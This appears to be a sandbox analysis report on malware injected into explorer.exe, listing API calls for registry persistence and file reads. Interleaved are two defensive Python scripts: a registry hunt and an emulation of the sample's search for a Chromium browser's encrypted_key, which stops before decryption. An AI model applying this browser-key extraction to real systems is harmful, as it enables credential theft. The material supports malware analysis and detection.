                                                                                                                                                      • Opcode ID: 87652dbd57f99ccea0693d4df64e64bd91cc8c9345ee272bd14f19782abed2c6
                                                                                                                                                      • Instruction ID: c475e55d612608634c38aad2b0e174ab2d7c269a3b48d7386f1b9ed43a0023ef
                                                                                                                                                      • Opcode Fuzzy Hash: 87652dbd57f99ccea0693d4df64e64bd91cc8c9345ee272bd14f19782abed2c6
                                                                                                                                                      • Instruction Fuzzy Hash: 4D51B171214709DFD725CF54EA81A6A77F5FB98304F24882DE9428B6D1DB70E805CB62

                                                                                                                                                      Control-flow Graph: blocks a0a40e-a0a553 (graph rendering omitted; legend: Executed / Not Executed)
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$FileReadmemset
                                                                                                                                                      • String ID: winRead
                                                                                                                                                      • API String ID: 2051157613-2759563040
                                                                                                                                                      • Opcode ID: 888438a52be17124c5a5460ae247f02d8bf01454605d6c93ac54a465614d27a1
                                                                                                                                                      • Instruction ID: 33a929e863e54aa8ce093acbfb0d05f31c1c2c07e8d286a968a2e6aa777d613c
                                                                                                                                                      • Opcode Fuzzy Hash: 888438a52be17124c5a5460ae247f02d8bf01454605d6c93ac54a465614d27a1
                                                                                                                                                      • Instruction Fuzzy Hash: 5631AB76608308ABC740DF68ED8589F77A6FFD8310F845928F88587291E2B1EC048B93

                                                                                                                                                      Control-flow Graph: blocks a02e30-a02f74 (graph rendering omitted; legend: Executed / Not Executed)
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIW.KERNELBASE(?,?), ref: 00A02E4B
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00A02EE4
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00A02F54
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00A02F62
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                        • Part of subcall function 00A01BC5: lstrlenW.KERNEL32(00000000,00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BCC
                                                                                                                                                        • Part of subcall function 00A01BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BF0
                                                                                                                                                        • Part of subcall function 00A01BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C05
                                                                                                                                                        • Part of subcall function 00A01BC5: lstrlenW.KERNEL32(00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C1C
                                                                                                                                                        • Part of subcall function 00A01AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00A02E83,PathToExe,00000000,00000000), ref: 00A01B16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                      • String ID: PathToExe
                                                                                                                                                      • API String ID: 1799103994-1982016430
                                                                                                                                                      • Opcode ID: 9bfd8c4c986454d49b1184ab4ef3f93269f81d8aa576bbbefd75fbf088edf019
                                                                                                                                                      • Instruction ID: 1b7dfe2254bcd36991e634282a51a68a8a9dbf57a8093a3dd9e0cec7722f5ca9
                                                                                                                                                      • Opcode Fuzzy Hash: 9bfd8c4c986454d49b1184ab4ef3f93269f81d8aa576bbbefd75fbf088edf019
                                                                                                                                                      • Instruction Fuzzy Hash: A4318D316043196FCB15AF21DC19DAF7AA9EFC4390B04851CF855872C0EA34C906CBA1

                                                                                                                                                      Control-flow Graph: blocks a0a67c-a0a740 (graph rendering omitted; legend: Executed / Not Executed)
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File_alldiv_allmul
                                                                                                                                                      • String ID: winTruncate1$winTruncate2
                                                                                                                                                      • API String ID: 3568847005-470713972
                                                                                                                                                      • Opcode ID: 31d8324b20ce979de52dbaf87632bff61ff2c1be19579de754b42ab5d6720b47
                                                                                                                                                      • Instruction ID: 6d83d83f0ad4bef23306b498a698adb644772305cb29fc8c599e6dc847649278
• Opcode Fuzzy Hash: 31d8324b20ce979de52dbaf87632bff61ff2c1be19579de754b42ab5d6720b47
• Instruction Fuzzy Hash: FE21AC72201208ABCB148F69EC85E6B77B9EFA4351F158169FD04DB296D635DC10CBA2

APIs
  • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
  • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
• wsprintfW.USER32 ref: 00A04AA2
• RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00A04AC7
• RegCloseKey.KERNELBASE(?), ref: 00A04AD4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: Heap$AllocateCloseCreateProcesswsprintf
• String ID: %s\%08x$Software
• API String ID: 1800864259-1658101971
• Opcode ID: d78e2e91bb801477414adb55226324064dc6754e92f97ec0b565775d13dd6172
• Instruction ID: 5622d6b509c97b47cb2906755578254881f95cbcc7e5a48a0161fad9db7b3ede
• Opcode Fuzzy Hash: d78e2e91bb801477414adb55226324064dc6754e92f97ec0b565775d13dd6172
• Instruction Fuzzy Hash: C601D471600108BFDB18DF95EC4ADBF77ADFB44355B80016EF90593181EAB05D459660
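The record above shows the injected explorer.exe code formatting a key name with wsprintfW("%s\%08x", …) from the string "Software", then calling RegCreateKeyExW on HKEY_CURRENT_USER (0x80000001) with desired access 0x000F003F (KEY_ALL_ACCESS). In other words it creates or opens HKCU\Software\<eight hex digits>; the records further down enumerate subkeys the same way (RegOpenKeyW, RegEnumKeyExW, lstrcatW). The dump does not reveal what the 32-bit value is derived from, so the only reliable artefact is the name shape. The following hunt script is an added example written for this page, not code from the report or from the sample: it reproduces the key-name construction, classifies subkey names offline against a constructed list, and, on Windows only, enumerates the live HKCU\Software hive with the standard-library winreg module. The helper names and the constructed subkey list are my own.

```python
import re
import sys
from typing import Iterable, List

# Constants exactly as they appear in the RegCreateKeyExW call in the report.
HKEY_CURRENT_USER = 0x80000001
KEY_ALL_ACCESS = 0x000F003F

# "%08x" always yields exactly eight hex digits. Registry key names are
# case-insensitive and other tooling may re-case them, so match either case.
_EIGHT_HEX = re.compile(r"^[0-9a-fA-F]{8}$")


def render_key_name(prefix: str, value: int) -> str:
    """Reproduce wsprintfW("%s\\%08x", prefix, value) as the sample does."""
    return f"{prefix}\\{value & 0xFFFFFFFF:08x}"


def is_suspicious_subkey(name: str) -> bool:
    """True when a subkey name has the SmokeLoader-style eight-hex-digit shape."""
    return bool(_EIGHT_HEX.match(name))


def hunt(subkeys: Iterable[str]) -> List[str]:
    """Return the suspicious names from an arbitrary list of subkey names, sorted."""
    return sorted(n for n in subkeys if is_suspicious_subkey(n))


def enumerate_hkcu_software() -> List[str]:
    """Live enumeration of HKCU\\Software (Windows only); mirrors the
    RegOpenKeyW / RegEnumKeyExW loop seen in the dump."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("registry enumeration requires Windows")
    import winreg  # standard library, only importable on Windows

    names: List[str] = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software") as key:
        index = 0
        while True:
            try:
                names.append(winreg.EnumKey(key, index))
            except OSError:  # ERROR_NO_MORE_ITEMS ends the enumeration
                break
            index += 1
    return names


# Constructed sample input (not taken from any real host): a few ordinary
# vendor keys plus two names that have the %08x shape.
CONSTRUCTED_SUBKEYS = ["Microsoft", "Classes", "7-Zip", "3f2a9c41", "Google", "DEADBEEF"]


if __name__ == "__main__":
    print("sample key:", render_key_name("Software", 0x3F2A9C41))
    source = enumerate_hkcu_software() if sys.platform.startswith("win") else CONSTRUCTED_SUBKEYS
    for hit in hunt(source):
        print("suspicious HKCU\\Software subkey:", hit)
```

An eight-hex-digit subkey under HKCU\Software is a lead, not a verdict: confirm it by checking what values it holds and whether explorer.exe is the process touching it, which is where this code runs according to the snapshot file name (hcaresult_14_2_a01000_explorer).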
APIs
• _alloca_probe.NTDLL ref: 00A0431C
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00A04335
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A04363
• RegCloseKey.ADVAPI32(?), ref: 00A043C8
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
  • Part of subcall function 00A0418A: wsprintfW.USER32 ref: 00A04212
  • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
  • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A043B9
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
• String ID:
• API String ID: 801677237-0
• Opcode ID: b53563cf9bcc6de3c1b8d0c9c55e59b67c9298f3608a3fb9a7b85f7f24189c33
• Instruction ID: 1a49f54a299a899a1f65901da56bb8a56e7807a69e1576353acbd26a09c90592
• Opcode Fuzzy Hash: b53563cf9bcc6de3c1b8d0c9c55e59b67c9298f3608a3fb9a7b85f7f24189c33
• Instruction Fuzzy Hash: CC1160B1108205AFE715DB60DC45DBB77EDFB88344F00862EF98AD2190EA749D499A62

APIs
• memset.NTDLL ref: 00A0B8D5
• CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00A0B96F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: CreateFilememset
• String ID: psow$winOpen
• API String ID: 2416746761-4101858489
• Opcode ID: 5aed4c0ee315a9bc9d49ffddcaeeb1e8ef77c976103411485eb0bd442dc992dc
• Instruction ID: 4ab951f9764f86fd96ea1521bc19bc628944bb03db5352206e20324ccd962505
• Opcode Fuzzy Hash: 5aed4c0ee315a9bc9d49ffddcaeeb1e8ef77c976103411485eb0bd442dc992dc
• Instruction Fuzzy Hash: 7F71B071A1470AAFC710DF28EA8175ABBE0FF88364F044A2DF864972D1D774D954CBA2

Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A67000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a67000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 515bebe60562db4dcd0703d0a3bb9dda89070127c46a1a7e164594820aca3941
• Instruction ID: 93c8fbf465618fae31bbb97f63a101eb8c3791201f3972375bbcb14b37d5774d
• Opcode Fuzzy Hash: 515bebe60562db4dcd0703d0a3bb9dda89070127c46a1a7e164594820aca3941
• Instruction Fuzzy Hash: 08A12B729547525BD7218F78DCC46A27BB9EB52324B2C066DC5E2CB2C2EB70980BC751

APIs
• RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
• RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
• RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
  • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
  • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: HeapQueryValue$CloseFreeOpenProcess
• String ID:
• API String ID: 217796345-0
• Opcode ID: 57a2042ee8923ce86ce951153c17c19e8470f408962218542693ca3b6455f143
• Instruction ID: e153ded347852aa7985c2b836e66328b7ab74e9ed2d2baee30e8f271b2289242
• Opcode Fuzzy Hash: 57a2042ee8923ce86ce951153c17c19e8470f408962218542693ca3b6455f143
• Instruction Fuzzy Hash: E921E5723063496FE7248B21ED44FBBB7E8EBC8799F004A2DF98692180E630CD418721

APIs
• RegOpenKeyW.ADVAPI32(?,?,?), ref: 00A01ED5
  • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
  • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
• RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A01F0C
• RegCloseKey.ADVAPI32(?), ref: 00A01F98
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
  • Part of subcall function 00A01953: lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
  • Part of subcall function 00A01953: lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
• RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A01F82
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
• String ID:
• API String ID: 1077800024-0
• Opcode ID: c1e5d401aabca21f249af40f4a796440f2c215a10b6ba0fa90271779b1e2213a
• Instruction ID: 81043ba25a73ec849a549ab3386b43d32a2057e8d40e3f20c90975539e7236ce
• Opcode Fuzzy Hash: c1e5d401aabca21f249af40f4a796440f2c215a10b6ba0fa90271779b1e2213a
• Instruction Fuzzy Hash: B9218E712083056FD7059B61EC48D7FBBEDFF88354F40892DF89A92190DB35C9059B22

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00A03E1E,00000000,?,00A03FA8), ref: 00A01C46
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,00A03FA8), ref: 00A01C56
• CloseHandle.KERNEL32(00000000,?,00A03FA8), ref: 00A01C91
  • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
  • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00A03FA8), ref: 00A01C76
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
• String ID:
• API String ID: 2517252058-0
• Opcode ID: 907a1d2481d2f6cf476f0b4d79c91ebcb67334da875d979b40ea0fe06c8baf7b
• Instruction ID: 8ea8a2bc0c58d34348ab5e749ca40c85c5810d545845664c84631c67bd9d108a
• Opcode Fuzzy Hash: 907a1d2481d2f6cf476f0b4d79c91ebcb67334da875d979b40ea0fe06c8baf7b
• Instruction Fuzzy Hash: 04F0A43120031C7BD2245B66EC8CEBB7A5CEB467F6F150719F516931D0EB229C464171

APIs
• StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00A03E30,00000000,00000000,?,00A03FA8), ref: 00A02FC1
• lstrlen.KERNEL32("encrypted_key":",?,00A03FA8), ref: 00A02FCE
• StrStrIA.SHLWAPI("encrypted_key":",00A5692C,?,00A03FA8), ref: 00A02FDD
  • Part of subcall function 00A0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
  • Part of subcall function 00A0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
  • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,?), ref: 00A01946
  • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID: "encrypted_key":"
• API String ID: 493641738-877455259
• Opcode ID: 4894cd00102f3ed3b579e8755f4c423415d1db4167bb3c3fadd811ff5cf03ff8
• Instruction ID: ccfa1dde580633a3826f7c15415f565297806d0c828bacd2db37c7bbccc84f6e
• Opcode Fuzzy Hash: 4894cd00102f3ed3b579e8755f4c423415d1db4167bb3c3fadd811ff5cf03ff8
• Instruction Fuzzy Hash: EBE06122705B295FC3A1ABF53C489973F2CBE023923440174F601D3153DE518816C3E0
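The two records above belong together: the first opens a file with CreateFileW(GENERIC_READ = 0x80000000, FILE_SHARE_READ = 1, OPEN_EXISTING = 3), sizes it with GetFileSize, reads it whole into a heap buffer, and the second runs StrStrIA over that buffer looking for the literal `"encrypted_key":"`. The report does not name the file, but that exact JSON member is the os_crypt.encrypted_key entry of a Chromium browser's Local State file, where the value is base64 of the ASCII tag "DPAPI" followed by a DPAPI-protected blob; I treat that identification as an assumption here. The script below is an added example for this page, not code from the report or the sample. It reproduces the byte-level marker search the malware performs, shows why that search is brittle compared with a real JSON parse (useful when writing detections or emulating the stealer's output), and stops at the DPAPI boundary: it never calls CryptUnprotectData, it only verifies the tag and returns the protected bytes. The Local State document and the blob are constructed test data, and all helper names are mine.

```python
import base64
import json
from typing import Optional, Tuple

# Literal the sample searches for with StrStrIA (case-insensitive substring).
MARKER = b'"encrypted_key":"'
# Tag that Chromium prepends to the DPAPI blob before base64-encoding it
# (assumption stated in the lead-in; not taken from the report).
DPAPI_TAG = b"DPAPI"


def find_encrypted_key_substring(buf: bytes) -> Optional[bytes]:
    """Mimic the sample: locate MARKER case-insensitively in the raw file
    bytes and return the quoted value that follows it, or None."""
    idx = buf.lower().find(MARKER.lower())
    if idx < 0:
        return None
    start = idx + len(MARKER)
    end = buf.find(b'"', start)
    return None if end < 0 else buf[start:end]


def find_encrypted_key_json(buf: bytes) -> Optional[str]:
    """Robust alternative: parse the document and read os_crypt.encrypted_key.
    Unlike the byte search, this tolerates whitespace and key ordering."""
    try:
        doc = json.loads(buf.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return None
    value = doc.get("os_crypt", {}).get("encrypted_key") if isinstance(doc, dict) else None
    return value if isinstance(value, str) else None


def split_dpapi_tag(b64_value: bytes) -> Tuple[bool, bytes]:
    """Base64-decode the value and strip the DPAPI tag. Returns (tag_present,
    remaining_bytes). The remaining bytes are still DPAPI-protected; decrypting
    them would require CryptUnprotectData in the owning user's context."""
    raw = base64.b64decode(b64_value, validate=True)
    if raw.startswith(DPAPI_TAG):
        return True, raw[len(DPAPI_TAG):]
    return False, raw


def build_constructed_local_state(protected_blob: bytes, compact: bool = True) -> bytes:
    """Constructed stand-in for a Local State file. compact=True writes the
    member as "encrypted_key":"…", the only form the sample's marker matches."""
    doc = {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_TAG + protected_blob).decode()},
           "profile": {"last_used": "Default"}}
    seps = (",", ":") if compact else (", ", ": ")
    return json.dumps(doc, separators=seps).encode("utf-8")


# Constructed placeholder, not a real DPAPI blob.
CONSTRUCTED_BLOB = b"\x01\x00\x00\x00" + b"\xaa" * 16


if __name__ == "__main__":
    state = build_constructed_local_state(CONSTRUCTED_BLOB)
    hit = find_encrypted_key_substring(state)
    print("marker hit:", hit)
    if hit:
        tagged, inner = split_dpapi_tag(hit)
        print("DPAPI tag present:", tagged, "protected bytes:", inner.hex())
    spaced = build_constructed_local_state(CONSTRUCTED_BLOB, compact=False)
    print("marker hit on spaced JSON:", find_encrypted_key_substring(spaced))
    print("json parse on spaced JSON:", find_encrypted_key_json(spaced))
```

The practical point for defenders is the mismatch between the two lookups: the sample's StrStrIA search only fires when the member is written without whitespace around the colon, so a detection that emulates it inherits that limitation, while the file read pattern itself (GENERIC_READ, OPEN_EXISTING, GetFileSize, single ReadFile) from an explorer.exe thread touching a browser profile directory is a better behavioural indicator than the string.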
APIs
• GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00A0BB40
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID: winDelete
• API String ID: 3188754299-3936022152
• Opcode ID: d83bb9a5ab243ada30cdadc256195c7fef126cb0861ace13bb7f127b9ece3ffd
• Instruction ID: 4ec2d6ec63b36e2499a2d336939770318343f10ce327fa7e8719e8b6306004d1
                                                                                                                                                      • Opcode Fuzzy Hash: d83bb9a5ab243ada30cdadc256195c7fef126cb0861ace13bb7f127b9ece3ffd
                                                                                                                                                      • Instruction Fuzzy Hash: 0B110831A1020CEBC710EBB8AA8187D7775EFA2760F144125F801D72D4DB308D02D762
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00A02EE4
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00A02F54
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00A02F62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1066184869-0
                                                                                                                                                      • Opcode ID: 334167efc11ee5c8dbc5d292390ad1e3c5875fbeed1059a3acd5ea291c85ae9f
                                                                                                                                                      • Instruction ID: b7139e3484adaf201fd8cc59c3012ac59b996fb03ac27be2bcc0888eafd31641
                                                                                                                                                      • Opcode Fuzzy Hash: 334167efc11ee5c8dbc5d292390ad1e3c5875fbeed1059a3acd5ea291c85ae9f
                                                                                                                                                      • Instruction Fuzzy Hash: 45018631204355ABC7159F21EC09EAF7FA9EFC4391F00442DF95A921D1DE358856EBA1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4175140541-0
                                                                                                                                                      • Opcode ID: abfbd102861a3ef25796391fa024f3565db1e09add6371a6b56e2025d368c028
                                                                                                                                                      • Instruction ID: 1ab946e373e36b150141612820ce3e6b8a6037b0e62aa2e0c8bcc04dcf20c8ec
                                                                                                                                                      • Opcode Fuzzy Hash: abfbd102861a3ef25796391fa024f3565db1e09add6371a6b56e2025d368c028
                                                                                                                                                      • Instruction Fuzzy Hash: 9AC04CB07453045BE680ABE06D0D75D3514BB04753F444104F309870D1DA5044028622
                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00A09FF8
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00A0A00E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                      • API String ID: 10892065-982776804
                                                                                                                                                      • Opcode ID: 36d285916002ec2125a97c41e0a63d8eb3d6f1e205afcba7fa97b54534069199
                                                                                                                                                      • Instruction ID: 86ec131f5ce17b4c57d911ac4c2f2c88dbb060f9e37c84d8e0c397b8e21fd62f
                                                                                                                                                      • Opcode Fuzzy Hash: 36d285916002ec2125a97c41e0a63d8eb3d6f1e205afcba7fa97b54534069199
                                                                                                                                                      • Instruction Fuzzy Hash: 56F02B7260434ABAE7305F94BC84F676BACDBA4785F140819FD46D21C1E6B1AC01C331
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00A02E83,PathToExe,00000000,00000000), ref: 00A01B16
